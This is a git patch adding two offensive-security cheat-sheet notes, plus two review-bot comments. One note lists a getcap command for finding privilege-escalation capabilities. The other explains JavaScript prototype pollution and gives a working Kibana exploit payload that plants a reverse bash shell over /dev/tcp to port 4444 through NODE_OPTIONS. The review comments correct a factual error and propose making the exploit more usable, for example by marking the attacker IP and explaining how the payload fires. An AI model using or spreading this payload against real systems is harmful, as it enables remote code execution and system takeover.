From 5b7c1e98f00bc4b46db251499c86c6cfa4e2473e Mon Sep 17 00:00:00 2001 From: whx Date: Fri, 3 Sep 2021 00:58:49 +0200 Subject: [PATCH] added prototype pollution --- exploit/linux/capabilities.md | 8 ++++++++ exploit/prototype_pollution.md | 31 +++++++++++++++++++++++++++++++ 2 files changed, 39 insertions(+) create mode 100644 exploit/linux/capabilities.md create mode 100644 exploit/prototype_pollution.md diff --git a/exploit/linux/capabilities.md b/exploit/linux/capabilities.md new file mode 100644 index 0000000..a524736 --- /dev/null +++ b/exploit/linux/capabilities.md @@ -0,0 +1,8 @@ +# Capabilities + +* [HackTricks](https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities) + +## Usage +```sh +getcap -r / 2>/dev/null +``` diff --git a/exploit/prototype_pollution.md b/exploit/prototype_pollution.md new file mode 100644 index 0000000..d12f7b7 --- /dev/null +++ b/exploit/prototype_pollution.md @@ -0,0 +1,31 @@ +# Prototype Pollution + +* Overwrite built in properties, like constructor, toString of an object. +* Any other instance inherits properties from `Object.__proto__`. toString() is inherited by all objects. +## Usage +* Access to prototype inside object, as an example Javascript +```javascript +obj.__proto__ +Object.prototype +``` +* Create object +```javascript +let obj = {} +``` +* Create properties inside `__proto__`. +```javascript +obj.__proto__.isAdmin = true +``` + +### Start Node commands +* Use + * `require` + * `eval` + +### Kibana CVE 2019 +* Write reverse bash into variable +```javascript +.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i >& /dev/tcp//4444 0>&1\'");//') +.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ') +``` +
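Review bot: In the `exploit/linux/capabilities.md` hunk the Usage section stops at enumeration: `getcap -r / 2>/dev/null` lists every binary carrying a file capability but gives the reader no idea which ones matter or how to check the capabilities of the process they already hold. Suggest adding one line naming the capabilities worth chasing for privilege escalation (cap_setuid, cap_dac_read_search, cap_sys_admin, cap_sys_ptrace) and a second command for the current process, e.g. `capsh --print` or `grep Cap /proc/self/status`, so the page is actionable rather than a single link to HackTricks.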
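Review bot: In the `exploit/prototype_pollution.md` hunk the second bullet is wrong: instances inherit from `Object.prototype`, not `Object.__proto__` (the latter is `Function.prototype`, since `Object` is a constructor function), and `obj.__proto__` is simply the accessor that reaches the same `Object.prototype` shown in the next code block; please replace `Object.__proto__` with `Object.prototype`. The "Start Node commands" section is a bare list of `require` and `eval` with no sentence on why they matter; say that a polluted property is only useful once it flows into a sink that evaluates or spawns code. In the Kibana section the heading gives no CVE identifier (add the full number), the reverse shell has an empty host between `/dev/tcp/` and `/4444` (mark it as a placeholder such as `<ATTACKER_IP>` so readers know to fill it in), and the two `.props(...)` lines are shown with no explanation of the mechanism: the first pollutes `env.AAAA` with JavaScript followed by `//`, the second sets `NODE_OPTIONS=--require /proc/self/environ`, so the payload fires only when a fresh Node child process is spawned and loads its own environment as a module. Without that last step the reader cannot tell why nothing happens after the two queries.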